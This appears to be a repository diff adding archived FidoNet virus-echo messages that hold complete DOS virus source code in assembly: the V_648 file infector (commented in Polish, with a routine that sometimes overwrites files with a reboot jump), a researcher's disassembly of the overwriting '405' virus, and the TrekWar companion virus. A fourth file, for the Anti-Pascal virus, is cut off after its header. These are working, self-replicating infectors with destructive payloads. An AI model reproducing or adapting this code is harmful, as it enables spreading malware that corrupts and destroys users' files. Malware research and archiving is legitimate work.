@ -0,0 +1,340 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 43 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : V_648.DIS
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Clif Jessop, 2:283/718 (06 Nov 94 17:50)
;* To : Edwin Cleton
;* Subj : V_648.DIS
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org
RET_NEAR_POP MACRO X
DB 0C2H
DW X
ENDM
cseg segment
assume cs:cseg
org $+100h
L0100: JMP L5BAA
org 5baah
L5BAA: PUSH CX
MOV DX,OFFSET L5DA3
CLD ;odtworzenie zmienionego kawalka
MOV SI,DX
ADD SI,0AH
MOV DI,OFFSET L0100
MOV CX,3
REPZ MOVSB
MOV SI,DX ;baza obszaru danych
MOV AH,30H ;Get MS-DOS version number
INT 21H
CMP AL,0 ;Major version number
JNZ L5BCA
JMP L5D91
L5BCA: PUSH ES
MOV AH,2FH ;Get DTA
INT 21H
MOV DS:[SI],BX ;schowanie starego DTA
MOV DS:[SI+2],ES
POP ES
MOV DX,5FH ;nowe DTA
NOP
ADD DX,SI
MOV AH,1AH ;Set DTA
INT 21H
PUSH ES ;<- szukanie PATH=
PUSH SI
MOV ES,DS:2CH ;Environment
MOV DI,0 ;adres w environmencie
L5BEB: POP SI
PUSH SI
ADD SI,1AH ;wzorzec PATH=
LODSB
MOV CX,8000h
REPNZ SCASB
MOV CX,4
L5BFA: LODSB
SCASB
JNZ L5BEB ;-> to nie to
LOOP L5BFA
POP SI
POP ES
MOV ds:[SI+16H],DI ;adres zawartosci path'a
MOV DI,SI
ADD DI,1FH ;obszar roboczy
; PATCH83
MOV BX,SI
ADD SI,1FH ;obszar roboczy
MOV DI,SI
JMP SHORT L5C50
;<------zmiana katalogu
L5C16: CMP WORD PTR ds:[SI+16H],0 ;adres zawartosci path'a
JNZ L5C20
JMP L5D83
L5C20: PUSH DS
PUSH SI
MOV DS,ES:2CH ;segment environmentu
MOV DI,SI
MOV SI,ES:[DI+16H] ;adres zawartosci path'a
ADD DI,1FH
; PATCH83
L5C32: LODSB
CMP AL,';' ;czy koniec pozycji ?
JZ L5C41
CMP AL,0 ;koniec environmentu
JZ L5C3E ;-> tak
STOSB
JMP SHORT L5C32
L5C3E: MOV SI,0 ;znacznik, ze wiecej juz nie ma
L5C41: POP BX
POP DS
MOV ds:[BX+16H],SI ;schowanie nowego pointera
CMP BYTE PTR [DI-1],'\' ;czy zakonczone back-slashem
JZ L5C50 ;-> tak
MOV AL,'\' ;uzupelnienie
STOSB
L5C50: MOV ds:[BX+18H],DI ;adres poczatku nazwy zbioru w path
MOV SI,BX
ADD SI,10H ;'*.com'
MOV CX,6
REPZ MOVSB
MOV SI,BX
MOV AH,4EH ;Find First File
MOV DX,1FH ;pointer na pathname
NOP
ADD DX,SI
MOV CX,3 ;Attrributes to match ro+hidden+zwykle
INT 21H
JMP SHORT L5C74
L5C70: MOV AH,4FH ;find next
INT 21H
L5C74: JNB L5C78 ;-> znaleziono
JMP SHORT L5C16 ;-> na nastepny katalog
L5C78: MOV AX,ds:[SI+75H] ;Time file was last written
AND AL,1FH ;czy juz zawirusowany ?
CMP AL,1FH
JZ L5C70 ;-> tak, odpuszczamy takim
CMP WORD PTR ds:[SI+79H],0FA00h ;low word of file size
JA L5C70 ;-> odpuszczamy zbyt duzym
CMP WORD PTR ds:[SI+79H],0AH
JB L5C70 ;-> odpuszczamy zbyt malym
MOV DI,ds:[SI+18H] ;adres nazwy zbioru w path
PUSH SI
ADD SI,7DH ;nazwa znalezionego zbioru
L5C9A: LODSB
STOSB
CMP AL,0
JNZ L5C9A
POP SI
MOV AX,4300h ;Get file attributes
MOV DX,1FH ;pathname
NOP
ADD DX,SI
INT 21H
MOV ds:[SI+8],CX ;Attribute byte
MOV AX,4301h ;Set attributes
AND CX,0FFFEh ;-read/only
MOV DX,1FH ;pathname
NOP
ADD DX,SI
INT 21H
MOV AX,3D02h ;Open file/write
MOV DX,1FH ;pathname
NOP
ADD DX,SI
INT 21H
JNB L5CCF
JMP L5D74
L5CCF: MOV BX,AX ;<- open O.K.
MOV AX,5700h ;Get date & time of file
INT 21H
MOV ds:[SI+4],CX ;schowanie daty ostatniej modyfikacji
MOV ds:[SI+6],DX
MOV AH,2CH ;Get Time
INT 21H
AND DH,7 ;ktory wariant ?
JNZ L5CF7 ;-> rozmnozenie
;<- destrukcja
MOV AH,40H ;Write handle
MOV CX,5 ;bytes
MOV DX,SI ;pointer to buffer
ADD DX,8AH
INT 21H
JMP SHORT L5D5B
NOP ;<- rozmnozenie
L5CF7: MOV AH,3FH ;Read handle
MOV CX,3 ;bytes
MOV DX,0AH ;buffer offset
NOP
ADD DX,SI
INT 21H
JB L5D5B ;-> blad
CMP AX,3 ;bytes read
JNZ L5D5B ;zbyt malo
MOV AX,4202h ;Move file pointer end+offset
MOV CX,0 ;offset
MOV DX,0 ;offset
INT 21H
JB L5D5B ;-> blad
MOV CX,AX ;adres konca
SUB AX,3 ;minus dlugosc jump'u
MOV ds:[SI+0EH],AX ;nowe 3 pierwsze bajty
ADD CX,02F9h
MOV DI,SI
SUB DI,01F7h
MOV [DI],CX ;<- adres zmiennych
MOV AH,40H ;write handle
MOV CX,0288h ;dlugosc wirusa
MOV DX,SI ;poczatek wirusa
SUB DX,01F9h
INT 21H
JB L5D5B ;-> blad
CMP AX,0288h ;czy wszystko zapisano
JNZ L5D5B ;-> nie
MOV AX,4200 ;Move file pointer poczatek
MOV CX,0 ;offset
MOV DX,0 ;offset
INT 21H
JB L5D5B ;-> blad
MOV AH,40H ;write
MOV CX,3 ;dlugosc
MOV DX,SI ;buffer
ADD DX,0DH
INT 21H
L5D5B: MOV DX,ds:[SI+6] ;koniec obrobki zbioru
MOV CX,ds:[SI+4]
AND CX,0FFE0h ;znacznik zawirusowania - czas
OR CX,1FH
MOV AX,5701h ;Set Date/Time of File
INT 21H
MOV AH,3EH ;Close handle
INT 21H
;<- blad otwarcia zbioru
L5D74: MOV AX,4301h ;Set File attributes
MOV CX,ds:[SI+8]
MOV DX,1FH
NOP
ADD DX,SI
INT 21H
L5D83: PUSH DS
MOV AH,1AH ;Set DTA
MOV DX,ds:[SI+0] ;poprzednia wartosc
MOV DS,ds:[SI+2] ;poprzednia wartosc
INT 21H
POP DS
L5D91: POP CX ;<- gdy dos < 2.0
XOR AX,AX
XOR BX,BX
XOR DX,DX
XOR SI,SI
MOV DI,0100h ;adres restartu
PUSH DI
XOR DI,DI
RET_NEAR_POP 0FFFFH
L5DA3 label word ;<- poczatek zmiennych programu
x0000 equ $-l5da3
dw 0080h,440Ch ;adres DTA oryginalny
x0004 equ $-l5da3
Dw 6d60H ;Time file last written
x0006 equ $-l5da3
Dw 0a67H ;Date file last written
x0008 dw 0020h ;file attribute - oryginal
x000a equ $-l5da3
db 0E9h,0ADh,0Bh ;schowana poprzednia zawartosc [100h]
x000d equ $-l5da3
db 0E9h,0A7h,5ah ;zapisywane do zbioru
x0010 equ $-l5da3
DB '*.COM',0 ;wzorzec do szukania
x0016 equ $-l5da3
dw 001CH ;adres path= w environmencie
x0018b equ $-l5da3
dw 65F3H ;adres nazwy zbioru w path x001f
x001a equ $-l5da3
db 'PATH=' ;szukane w environmencie
;---------------------------------------
x001f equ $-l5da3
db 'COMMAND.COM',0 ;nazwa obrabianego zbioru
db 'OM',0
db 'M',0
db 'COM',0
db 'OM',0
db ' '
db ' '
;----------------------------------------
x005f equ $-l5da3 ;<- nowe DTA
db 1,'????????COM',3,2 ;reserved area
db ?,?
DB 0,0,0,0,0,0,0
db 20h ;attribute found
x0075 equ $-l5da3
dw 6d60h ;Time file was last written
dw 0a67h ;date file was last written
x0079 equ $-l5da3
Dw 5AAAH ;Low word of file size
Dw 0 ;High word of file size
x007d equ $-l5da3
db 'COMMAND.COM',0,0 ;name and extension
;----------------------------------------
x008a equ $-l5da3 ;zapisywane do zbioru
db 0EAH,0F0H,0FFH,0,0F0H ;jmp 0f000:0fff0h
cseg ENDS
END L0100
;-+- DinoMail v.1.0 Alpha
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/Txx Specify output file type
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

238
MSDOS/Virus.MSDOS.Unknown.vir54.asm Normal file
View File

@ -0,0 +1,238 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 44 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : 405_B.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Doug Bryce, 2:283/718 (06 Nov 94 17:51)
;* To : Mike Nisbett
;* Subj : 405_B.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org
title The '405' virus
page 65,132
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú British Computer Virus Research Centre ú
; ú 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ú
; ú Telephone: Domestic 0273-26105, International +44-273-26105 ú
; ú ú
; ú The '405' Virus ú
; ú Disassembled by Joe Hirst, March 1989 ú
; ú ú
; ú Copyright (c) Joe Hirst 1989. ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus overwrites the first 405 bytes of a COM file. If the
; length of the COM file is less than this, the length is increased
; to 405 bytes.
; The disassembly has been tested by re-assembly using MASM 5.0.
BUFFER SEGMENT AT 0
ORG 295H
DW0295 DW ?
DB0297 DB ?
ORG 0E000H
DWE000 DW ? ; Read buffer area
ORG 0E195H
DWE195 DW ? ; Program after virus
BUFFER ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,ES:BUFFER
VIRLEN EQU OFFSET ENDADR-START
ORG 100H
START: XCHG SI,AX
ADD [BX+SI],AL
SAHF
ADD [BX+SI],AL
NOP
MOV AX,0 ; Clear register
MOV ES:DB0249,AL ; Set current disk to default
MOV ES:DB024B,AL ; Set pathname store to zero
MOV ES:DB028B,AL ; Set number of drives to zero
PUSH AX
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB0249,AL ; Save current disk
MOV AH,47H ; Get current directory function
ADD AL,1 ; Next drive (A)
PUSH AX
MOV DL,AL ; Drive A
LEA SI,DB024B ; Pathname store
INT 21H ; DOS service
POP AX
MOV AH,0EH ; Select disk function
SUB AL,1 ; Convert drive for select function
MOV DL,AL ; Move drive
INT 21H ; DOS service
MOV ES:DB028B,AL ; Save number of drives
BP0139: MOV AL,ES:DB0249 ; Get current disk
CMP AL,0 ; Is drive A?
JNZ BP0152 ; Branch if not
MOV AH,0EH ; Select disk function
MOV DL,2 ; Change drive to B
INT 21H ; DOS service
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB024A,AL ; Save new current drive
JMP BP0179
BP0152: CMP AL,1 ; Is drive B?
JNZ BP0167 ; Branch if not
MOV AH,0EH ; Select disk function
MOV DL,2 ; Change drive to C
INT 21H ; DOS service
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB024A,AL ; Save new current drive
JMP BP0179
BP0167: CMP AL,2 ; Is drive C?
JNZ BP0179 ; Branch if not
MOV AH,0EH ; Select disk function
MOV DL,0 ; Change drive to A
INT 21H ; DOS service
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV ES:DB024A,AL ; Save new current drive
BP0179: MOV AH,4EH ; Find first file function
MOV CX,1 ; Find read-only files, not system
LEA DX,DB028C ; Path '*.COM'
INT 21H ; DOS service
JB BP0189 ; Branch if error
JMP BP01A9 ; Process COM file
BP0189: MOV AH,3BH ; Change current directory function
LEA DX,DB0297 ; Directory pathname (this is past the end)
INT 21H ; DOS service
MOV AH,4EH ; Find first file function
MOV CX,0011H ; Find directory and read-only
LEA DX,DB0292 ; Path '*'
INT 21H ; DOS service
JB BP0139 ; Branch if error
JMP BP0179 ; Find a COM file
BP01A0: MOV AH,4FH ; Find next file function
INT 21H ; DOS service
JB BP0189 ; Branch if error
JMP BP01A9 ; Process COM file
; Process COM file
BP01A9: MOV AH,3DH ; Open handle function
MOV AL,2 ; R/W access
MOV DX,009EH ; File pathname
INT 21H ; DOS service
MOV BX,AX ; Move handle
MOV AH,3FH ; Read handle function
MOV CX,VIRLEN ; Length of virus
NOP
MOV DX,OFFSET DWE000 ; Read it in way down there
NOP
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
MOV BX,DWE000 ; Get first word of COM file
CMP BX,9600H ; Is it infected? (should be 0096H)
JZ BP01A0 ; Yes, find another one
MOV AH,43H ; \ Get file attributes function
MOV AL,0 ; /
MOV DX,009EH ; File pathname
INT 21H ; DOS service
MOV AH,43H ; \ Set file attributes function
MOV AL,1 ; /
AND CX,00FEH ; Set off read only attribute
INT 21H ; DOS service
MOV AH,3DH ; Open handle function
MOV AL,2 ; R/W mode
MOV DX,009EH ; File pathname
INT 21H ; DOS service
MOV BX,AX ; Move handle
MOV AH,57H ; \ Get file date & time function
MOV AL,0 ; /
INT 21H ; DOS service
PUSH CX
PUSH DX
ASSUME ES:NOTHING
MOV DX,CS:DW0295 ; Get word after virus here
MOV CS:DWE195,DX ; Move to same position in prog
MOV DX,CS:DWE000+1 ; Get displacement from initial jump
LEA CX,DB0294-100H ; Length of virus minus one
SUB DX,CX
MOV CS:DW0295,DX ; Store in word after virus
MOV AH,40H ; Write handle function
MOV CX,VIRLEN ; Length of virus
NOP
LEA DX,START ; Beginning of virus
INT 21H ; DOS service
MOV AH,57H ; \ Set file date & time function
MOV AL,1 ; /
POP DX
POP CX
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
MOV DX,CS:DWE195 ; Get word after virus
MOV CS:DW0295,DX ; Move to same position here
JMP BP0234
BP0234: MOV AH,0EH ; Select disk function
MOV DL,CS:DB0249 ; Get current disk
INT 21H ; DOS service
MOV AH,3BH ; Change current directory function
LEA DX,DB024A ; Address of path - this is incorrect
INT 21H ; DOS service
MOV AH,0 ; Terminate program function
INT 21H ; DOS service
DB0249 DB 2 ; Current disk
DB024A DB 0 ; New current drive
; There should be an extra byte at this point containing '\'
; for use by the change directory function - this is why that
; function is pointing at the previous field
DB024B DB 'TEST', 3CH DUP (0)
DB028B DB 0DH ; Number of drives
DB028C DB '*.COM', 0
DB0292 DB '*', 0
DB0294 DB 0E9H
ENDADR EQU $
CODE ENDS
END START
;-+- FidoPCB v1.4 [NR]
; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/uxxxx Set version emulation, version xxxx
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

213
MSDOS/Virus.MSDOS.Unknown.vir55.asm Normal file
View File

@ -0,0 +1,213 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 45 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TREKWAR.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:51)
;* To : Daniel Hendry
;* Subj : TREKWAR.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org
;TrekWar
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ Assembly Source Listing for TrekWar Companion Virus ³
;³ Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) ³
;ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
;³ The TrekWar is a simple modification of the Clonewar V2 companion virus; ³
;³ for all you trekkers out there... For those of you who, heaven forbid, do ³
;³ not know what the words below mean, they are the words to the old series ³
;³ opening music of Star Trek... ³
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
CSEG SEGMENT
ASSUME CS:CSEG,DS:NOTHING
ORG 100H
START:
jmp VIR_BEGIN ;lets get moving...
db "",13,10
db "",13,10
db "Beyond",13,10 ;blah blah blah
db "The rim of the star-light",13,10
db "My love",13,10
db "Is wand'ring in star-flight",13,10
db "I know",13,10
db "He'll find in star-clustered reaches",13,10
db "Love",13,10
db "Strange love a star woman teaches.",13,10
db "I know",13,10
db "His journey ends never",13,10
db "His star trek",13,10
db "Will go on forever.",13,10
db "But tell him",13,10
db "While he wanders his starry sea",13,10
db "Remember, remember me."
db "",13,10
db "",13,10
db "[TrekWar] " ;what the heck, its only a few bytes!?
WILDCARD DB "*.EXE",0
FILE_EXT DB "COM",0
FILE_FOUND DB 12 DUP(' '), 0
FILE_CREATE DB 12 DUP(' '), 0
SEARCH_ATTRIB DW 17H
NUM_INFECT DW 0
My_Cmd:
CMD_LEN DB 13
FILE_CLONE DB 12 DUP (' '), 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Read all the directory filenames and store as records in buffer.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Vir_begin:
mov sp,offset STACK_HERE ;move stack down
mov bx,sp
add bx,15
mov cl,4
shr bx,cl
mov ah,4ah ;deallocate rest of memory
int 21h
mov di,OFFSET FILE_CLONE ;Point to buffer.
mov si,OFFSET FILE_FOUND
mov cx,12
rep movsb
Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
mov cx,SEARCH_ATTRIB
mov ah,4Eh ;find first matching file
int 21h
jc EXIT ;If empty directory, exit
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Store_name:
mov di,OFFSET FILE_FOUND ;Point to buffer.
mov si,158 ;stow the file found in buffer
mov cx,12
rep movsb
mov di,OFFSET FILE_CREATE ;Point to buffer.
mov si,158
mov cx,12
rep movsb
cld
mov di,OFFSET FILE_CREATE
mov al,'.'
mov cx,9
repne scasb ;find the '.'
mov si,OFFSET FILE_EXT
mov cx,3
rep movsb ;replace the .EXE with .COM
;from buffer
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Check_file: ;does the file exist?
mov dx,OFFSET FILE_CREATE
xor cx,cx
mov ax,3d00h ;Open file, read only
int 21h
jnc find_next
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Infect_file: ;create companion routine
mov dx,OFFSET FILE_CREATE ;contains name of "companion"
xor cx,cx
mov ah,3ch ;construct file
int 21h
jc EXIT
;Write virus to companion file
xchg bx,ax
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
mov dx,OFFSET START
mov ah,40h ;write to file function
int 21h ;do it
;Close file
mov ah,3eh ;assumes bx still has file handle
int 21h
;Change attributes
mov dx,OFFSET FILE_CREATE ;of created file to
mov cx,3 ;(1) read only and (2) hidden
mov ax,4301h
int 21h
jmp prepare_command
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;...findnext...
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
find_next:
mov ah, 4fh ;find next...
int 21h
jmp store_name
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Prepare_command:
cld
mov di,OFFSET FILE_CLONE
mov al,0
mov cx,12
repne scasb ;find the end of string \0
mov al,0Dh ;<CR>
stosb ;replace \0 with a <CR>
mov ax,12 ;store length of the command
sub ax,cx
mov CMD_LEN, al
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Exit:
;Run the original program
mov si, OFFSET MY_CMD
int 2Eh ;Pass command to command
;interpreter for execution
mov ax,4C00H ;Exit to DOS
int 21h
END_OF_CODE = $
STACK_HERE EQU END_OF_CODE + 512
CSEG ENDS
END START
;-+- FMail 0.96â
; + Origin: ViRUS PaRk BbS >916< 387-6159 24HouRs (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

316
MSDOS/Virus.MSDOS.Unknown.vir56.asm Normal file
View File

@ -0,0 +1,316 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 46 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : AP_440.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Fred Lee, 2:283/718 (06 Nov 94 17:54)
;* To : Mike Nisbett
;* Subj : AP_440.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org
page ,132
name AP440
title The 'Anti-Pascal' virus, version AP-440
.radix 16
